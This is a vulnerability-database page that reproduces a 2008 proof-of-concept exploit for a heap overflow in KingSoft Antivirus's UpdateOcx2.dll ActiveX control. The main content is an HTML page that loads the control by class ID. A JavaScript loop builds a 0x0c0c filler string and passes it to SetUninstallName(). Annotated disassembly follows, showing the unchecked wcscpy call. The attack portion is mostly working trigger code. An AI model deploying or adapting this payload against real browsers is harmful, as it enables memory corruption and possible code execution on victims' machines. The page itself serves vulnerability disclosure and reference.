Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)

🗓️ 10 Mar 2008 00:00:00Reported by voidType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 30 Views

KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC) - 2008-02-2

Code
<!--
KingSoft UpdateOcx2.dll SetUninstallName() Heap Overflow Exploit

Date: 2008-02-29
MSN: void[at]ph4nt0m[dot]org
http://www.ph4nt0m.org

文件路径: C:\WINDOWS\system32\KingSoft\KOS\UpdateOcx2.dll
文件描述: Kingsoft Antivirus Online Update Module
文件版本: 2007,12,29,29
-->

<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target1'></object>
<object classid='clsid:D82303B7-A754-4DCB-8AFC-8CF99435AACE' id='target2'></object>
<script>
var str1 = "";
while (str1.length < 914)
{ str1 += unescape("%u0c0c");
}
target1.SetUninstallName(str1);
</script>

<!--
.text:1000737B ; DWORD __stdcall SetUninstallName(LPVOID this_ptr, LPVOID bsUninstallName)
.text:1000737B SetUninstallName proc near              ; DATA XREF: .rdata:1003186C o
.text:1000737B                                         ; .rdata:10031A64 o
.text:1000737B
.text:1000737B this_ptr        = dword ptr 4
.text:1000737B bsUninstallName = dword ptr 8
.text:1000737B
.text:1000737B                 mov     eax, [esp+this_ptr]
.text:1000737F                 push    [esp+bsUninstallName]
.text:10007383                 add     eax, 20h
.text:10007386                 mov     ecx, [eax]
.text:10007388                 push    eax
.text:10007389                 call    dword ptr [ecx+20h] ; 此处跟进 10012278
.text:1000738C                 xor     eax, eax
.text:1000738E                 retn    8
.text:1000738E SetUninstallName endp


.text:10012278 ; =============== S U B R O U T I N E =======================================
.text:10012278
.text:10012278
.text:10012278 ; int __stdcall Vul_Func(int, wchar_t *Source)
.text:10012278 Vul_Func        proc near               ; DATA XREF: .rdata:10032D3C o
.text:10012278
.text:10012278 arg_0           = dword ptr 4
.text:10012278 Source          = dword ptr 8
.text:10012278
.text:10012278                 cmp     [esp+Source], 0
.text:1001227D                 jz      short loc_10012294
.text:1001227F                 mov     eax, [esp+arg_0]
.text:10012283                 push    [esp+Source]    ; Source
.text:10012287                 add     eax, 0D70h
.text:1001228C                 push    eax             ; Dest
.text:1001228D                 call    _wcscpy         ; 没有检查用户输入的长度就,é€ æˆheap overlfow
.text:10012292                 pop     ecx
.text:10012293                 pop     ecx
.text:10012294
.text:10012294 loc_10012294:                           ; CODE XREF: Vul_Func+5 j
.text:10012294                 xor     eax, eax
.text:10012296                 retn    8
.text:10012296 Vul_Func        endp
.text:10012296
-->

# milw0rm.com [2008-03-10]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
kingsoft antivirus online update moduleheap overflowexploitkingsoft updateocx2.dll2007122929ph4nt0m.org
30